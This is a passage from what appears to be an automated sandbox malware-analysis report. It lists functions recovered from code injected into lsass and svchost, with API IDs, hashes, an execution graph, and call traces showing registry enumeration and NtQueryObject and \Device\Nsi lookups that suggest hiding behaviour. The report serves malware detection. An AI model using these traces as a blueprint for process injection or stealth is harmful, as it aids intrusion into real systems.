                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 8446a618bbd1140fecb175adc7a255fff733e8375c6260d7fd1f59283cc66251
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 1151AB32601700CAFB29CF29E48CB5D3795F354B98F568227DB164378AEB35D889C704
                                                              Function 00000202C0AB83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: 90803dd6b9b29f9c4154e969358d487dae67566bd5ce1f620f43925fcc542657
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: 7F316A32201740D6FB299F29E88C75D7BA4F340B98F168117AF5A07786DB39C948C704
                                                              Function 00000202C0AF2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction ID: 5415e984cde6a1f954e745032577872c235aef40fdbcb0d3a10d64624b9653db
                                                              • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction Fuzzy Hash: 99D1BC73B14B80C9F721CFA9D48829C3BA1F354B98F158217CF5A97B9ADA39C54AC740
                                                              Function 00000202C0AE14A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free
                                                              • String ID:
                                                              • API String ID: 3168794593-0
                                                              • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction ID: e1a4700da16e8d3ef1b17da53b22238d79ed5d8b917823312ea25b365b8a4f34
                                                              • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction Fuzzy Hash: 1E117977500B90C6F714DF62A88C14DB7A4F788F81F0A4127EB4903766DE39C0598744
                                                              Function 00000202C0AF2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction ID: 7750c07c3da3ab5777ee1fb19e88fe5ee8ba8c540cdc789170c23b37d6888931
                                                              • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction Fuzzy Hash: D9918A73610B50C9FB61DF6594CC7AD2BA0B744B88F56410BDF4A67A96DB3AC88BC700
                                                              Function 00000202C0AE7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: c1e121f40b66a15715f8d269b70c98ee374ca54bb48e74cdb6f3174d14493375
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: 34111C22710B01C9FB00CB60E8983AC33A4F719B58F450E22DB6D467A5DB78C5988380
                                                              Function 00000202C0AB9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: f3028f0bacb26f4c6116040a1e45f79bacc9d5a175de68b6d573a429fff7c7f3
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: B7614532A00B84CAFB24DF65D4883AD77A0F748B98F154217EF4917B9ADB38D599C704
                                                              Function 00000202C0AE2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: 3514571e2c1d6cd3889b28a5e79674fb4b07f5075b2e224e86b20f94a4d05b12
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: 2B5180322087C1C1F6649B29A5DC3BEA791F385B80F560127DFEA03B9BDA39C52D8750
                                                              Function 00000202C0AF26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: b84669cd5d919c91a09ffca97e8587df6a0950af1a2baa035680203c31bd1311
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: 93418E63614B80C6EB209F25E8883AEA7A0F798794F524023EF4D87795EB39C44AC740
                                                              Function 00000202C0AE94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction ID: 149d407967b934cd8ed689359ce0485475af0033eaf3f8f7976efa754672e473
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: 8F112B36214B8082EB618B15E48835D77E5F788B94F594222EFCC077A9DF3DC569CB04
                                                              Function 00000202C0AB7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: ierarchy Descriptor'$riptor at (
                                                              • API String ID: 592178966-758928094
                                                              • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction ID: 8da40ad284d153a9b89d1544e12ba7a913fe1935213764a8cba5128ad5ea2d85
                                                              • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction Fuzzy Hash: A1E08661641B44D0EF018F31E88829C33A4DB58B64F9A91239A5C06312FA38D1EDC300
                                                              Function 00000202C0AB73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: Locator'$riptor at (
                                                              • API String ID: 592178966-4215709766
                                                              • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction ID: 5205816057d34bf06f4ea810c880042c8f0231ff55e9ce8539c58bb0b426eeb2
                                                              • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction Fuzzy Hash: 30E08661601F44C0EF058F31D88419C73A4E758B54F8A9123DA4C06312EA38D1E9C300
                                                              Function 00000202C0AE1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 0bfdd2f4f70d0c77588d297d632a834cc4e271defd7936f82574c36193d19b8d
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: 6C119A26601B94C1FA44CB66A88C22D63A0FBC8FC0F1A412BDF8D83766DF39C45AC300
                                                              Function 00000202C0AE1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: 14bf7bafefd4b55b8bc325b1bb0149ce76066631eeb9ae1ebb85862f094286e6
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: 48E03936601704C6FB048B62D84C34A36E5EB89B06F0681268B0907362DF7E8499C750

                                                              Execution Graph

                                                              Execution Coverage:0.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:73
                                                              Total number of Limit Nodes:2
                                                              execution_graph 14858 2a661301abc 14863 2a661301628 GetProcessHeap 14858->14863 14860 2a661301ad2 Sleep SleepEx 14861 2a661301acb 14860->14861 14861->14860 14862 2a661301598 StrCmpIW StrCmpW 14861->14862 14862->14861 14864 2a661301648 _invalid_parameter_noinfo 14863->14864 14908 2a661301268 GetProcessHeap 14864->14908 14866 2a661301650 14867 2a661301268 2 API calls 14866->14867 14868 2a661301661 14867->14868 14869 2a661301268 2 API calls 14868->14869 14870 2a66130166a 14869->14870 14871 2a661301268 2 API calls 14870->14871 14872 2a661301673 14871->14872 14873 2a66130168e RegOpenKeyExW 14872->14873 14874 2a6613018a6 14873->14874 14875 2a6613016c0 RegOpenKeyExW 14873->14875 14874->14861 14876 2a6613016e9 14875->14876 14877 2a6613016ff RegOpenKeyExW 14875->14877 14912 2a6613012bc RegQueryInfoKeyW 14876->14912 14878 2a66130173a RegOpenKeyExW 14877->14878 14879 2a661301723 14877->14879 14882 2a66130175e 14878->14882 14883 2a661301775 RegOpenKeyExW 14878->14883 14923 2a66130104c RegQueryInfoKeyW 14879->14923 14886 2a6613012bc 13 API calls 14882->14886 14887 2a661301799 14883->14887 14888 2a6613017b0 RegOpenKeyExW 14883->14888 14889 2a66130176b RegCloseKey 14886->14889 14890 2a6613012bc 13 API calls 14887->14890 14891 2a6613017eb RegOpenKeyExW 14888->14891 14892 2a6613017d4 14888->14892 14889->14883 14895 2a6613017a6 RegCloseKey 14890->14895 14893 2a661301826 RegOpenKeyExW 14891->14893 14894 2a66130180f 14891->14894 14896 2a6613012bc 13 API calls 14892->14896 14898 2a66130184a 14893->14898 14899 2a661301861 RegOpenKeyExW 14893->14899 14897 2a66130104c 5 API calls 14894->14897 14895->14888 14900 2a6613017e1 RegCloseKey 14896->14900 14901 2a66130181c RegCloseKey 14897->14901 14902 2a66130104c 5 API calls 14898->14902 14903 2a66130189c RegCloseKey 14899->14903 14904 2a661301885 14899->14904 14900->14891 14901->14893 14905 2a661301857 RegCloseKey 14902->14905 14903->14874 14906 2a66130104c 5 API calls 14904->14906 14905->14899 14907 2a661301892 RegCloseKey 14906->14907 14907->14903 14929 2a661316168 14908->14929 14910 2a661301283 GetProcessHeap 14911 2a6613012ae _invalid_parameter_noinfo 14910->14911 14911->14866 14913 2a661301327 GetProcessHeap 14912->14913 14914 2a66130148a RegCloseKey 14912->14914 14915 2a66130133e _invalid_parameter_noinfo 14913->14915 14914->14877 14916 2a661301476 GetProcessHeap HeapFree 14915->14916 14917 2a661301352 RegEnumValueW 14915->14917 14919 2a66130141e lstrlenW GetProcessHeap 14915->14919 14920 2a6613013d3 GetProcessHeap 14915->14920 14921 2a6613013f3 GetProcessHeap HeapFree 14915->14921 14922 2a661301443 StrCpyW 14915->14922 14930 2a66130152c 14915->14930 14916->14914 14917->14915 14919->14915 14920->14915 14921->14919 14922->14915 14924 2a6613010bf _invalid_parameter_noinfo 14923->14924 14925 2a6613011b5 RegCloseKey 14923->14925 14924->14925 14926 2a6613010cf RegEnumValueW 14924->14926 14927 2a66130114e GetProcessHeap 14924->14927 14928 2a66130116e GetProcessHeap HeapFree 14924->14928 14925->14878 14926->14924 14927->14924 14928->14924 14931 2a66130157c 14930->14931 14934 2a661301546 14930->14934 14931->14915 14932 2a66130155d StrCmpIW 14932->14934 14933 2a661301565 StrCmpW 14933->14934 14934->14931 14934->14932 14934->14933 14935 2a6612d273c 14938 2a6612d276a 14935->14938 14936 2a6612d28d4 14937 2a6612d2858 LoadLibraryA 14937->14938 14938->14936 14938->14937

                                                              Executed Functions

                                                              Function 000002A66130328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: 077229c1eed964279b07ec97370b47b92095969d86f76acc536d4c6ada0caa5e
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: DC11AD70F246408BFB60EB61F98DB6923ECA746F46F8C41249907A3691EF7CC04C8283
                                                              Function 000002A661301ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 000002A661301628: GetProcessHeap.KERNEL32 ref: 000002A661301633
                                                                • Part of subcall function 000002A661301628: HeapAlloc.KERNEL32 ref: 000002A661301642
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016B2
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DF
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613016F9
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301719
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301734
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301754
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130176F
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130178F
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017AA
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017CA
                                                              • Sleep.KERNEL32 ref: 000002A661301AD7
                                                              • SleepEx.KERNELBASE ref: 000002A661301ADD
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017E5
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301805
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301820
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301840
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130185B
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130187B
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301896
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613018A0
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: 99b07525fd2711d8e82b8b49fba128a9359a21ce05ef994d83d7f8484eb62716
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: F3314171B00A4593FF509B26DA4D3A963FCAB46FCAF0C54219E0BA7295FF1CC459C292
                                                              Function 000002A661303844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 57 2a661303844-2a66130384f 58 2a661303869-2a661303870 57->58 59 2a661303851-2a661303864 StrCmpNIW 57->59 59->58 60 2a661303866 59->60 60->58
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: dialer
                                                              • API String ID: 0-3528709123
                                                              • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                              • Instruction ID: 84d7da99e8808b0adfb76846f8b28e16625e6655772c6f218550ef611b4de524
                                                              • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                              • Instruction Fuzzy Hash: 59D0A760B512498BFF14DFE688CDA603798EB09F45F8C4034D90213150DF6C8A9D9711
                                                              Function 000002A6612D273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073099335.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a6612d0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: 1627250a6f1587746d6adcb486bc21ae0d1f8d3e6a0bb4f849c2ff22e67d6bd2
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: DC61F0B2F016908BDB548F25D0487ADB3AEFB55FA4F688121DE5907788DF38D89AC701

                                                              Non-executed Functions

                                                              Function 000002A661302B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 367 2a661302b2c-2a661302ba5 call 2a661322ce0 370 2a661302bab-2a661302bb1 367->370 371 2a661302ee0-2a661302f03 367->371 370->371 372 2a661302bb7-2a661302bba 370->372 372->371 373 2a661302bc0-2a661302bc3 372->373 373->371 374 2a661302bc9-2a661302bd9 GetModuleHandleA 373->374 375 2a661302bdb-2a661302beb call 2a661316090 374->375 376 2a661302bed 374->376 378 2a661302bf0-2a661302c0e 375->378 376->378 378->371 381 2a661302c14-2a661302c33 StrCmpNIW 378->381 381->371 382 2a661302c39-2a661302c3d 381->382 382->371 383 2a661302c43-2a661302c4d 382->383 383->371 384 2a661302c53-2a661302c5a 383->384 384->371 385 2a661302c60-2a661302c73 384->385 386 2a661302c83 385->386 387 2a661302c75-2a661302c81 385->387 388 2a661302c86-2a661302c8a 386->388 387->388 389 2a661302c9a 388->389 390 2a661302c8c-2a661302c98 388->390 391 2a661302c9d-2a661302ca7 389->391 390->391 392 2a661302d9d-2a661302da1 391->392 393 2a661302cad-2a661302cb0 391->393 394 2a661302da7-2a661302daa 392->394 395 2a661302ed2-2a661302eda 392->395 396 2a661302cc2-2a661302ccc 393->396 397 2a661302cb2-2a661302cbf call 2a66130199c 393->397 400 2a661302dbb-2a661302dc5 394->400 401 2a661302dac-2a661302db8 call 2a66130199c 394->401 395->371 395->385 398 2a661302cce-2a661302cdb 396->398 399 2a661302d00-2a661302d0a 396->399 397->396 398->399 403 2a661302cdd-2a661302cea 398->403 404 2a661302d3a-2a661302d3d 399->404 405 2a661302d0c-2a661302d19 399->405 407 2a661302dc7-2a661302dd4 400->407 408 2a661302df5-2a661302df8 400->408 401->400 412 2a661302ced-2a661302cf3 403->412 414 2a661302d4b-2a661302d58 lstrlenW 404->414 415 2a661302d3f-2a661302d49 call 2a661301bbc 404->415 405->404 413 2a661302d1b-2a661302d28 405->413 407->408 417 2a661302dd6-2a661302de3 407->417 410 2a661302dfa-2a661302e03 call 2a661301bbc 408->410 411 2a661302e05-2a661302e12 lstrlenW 408->411 410->411 429 2a661302e4a-2a661302e55 410->429 421 2a661302e14-2a661302e1e 411->421 422 2a661302e35-2a661302e3f call 2a661303844 411->422 419 2a661302cf9-2a661302cfe 412->419 420 2a661302d93-2a661302d98 412->420 423 2a661302d2b-2a661302d31 413->423 425 2a661302d5a-2a661302d64 414->425 426 2a661302d7b-2a661302d8d call 2a661303844 414->426 415->414 415->420 427 2a661302de6-2a661302dec 417->427 419->399 419->412 433 2a661302e42-2a661302e44 420->433 421->422 434 2a661302e20-2a661302e33 call 2a66130152c 421->434 422->433 423->420 435 2a661302d33-2a661302d38 423->435 425->426 428 2a661302d66-2a661302d79 call 2a66130152c 425->428 426->420 426->433 427->429 430 2a661302dee-2a661302df3 427->430 428->420 428->426 442 2a661302e57-2a661302e5b 429->442 443 2a661302ecc-2a661302ed0 429->443 430->408 430->427 433->395 433->429 434->422 434->429 435->404 435->423 444 2a661302e5d-2a661302e61 442->444 445 2a661302e63-2a661302e7d call 2a6613085c0 442->445 443->395 444->445 448 2a661302e80-2a661302e83 444->448 445->448 451 2a661302ea6-2a661302ea9 448->451 452 2a661302e85-2a661302ea3 call 2a6613085c0 448->452 451->443 454 2a661302eab-2a661302ec9 call 2a6613085c0 451->454 452->451 454->443
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: 517c12f0b0e1090de60bb0fcc7bf1fefb46beb5eab338aff40a4245cd4b9731a
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 52B17C72B10A9087EB649F35D64C7A963E9F746F86F485016EE0A63B94DF39CC48C381
                                                              Function 000002A661307D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
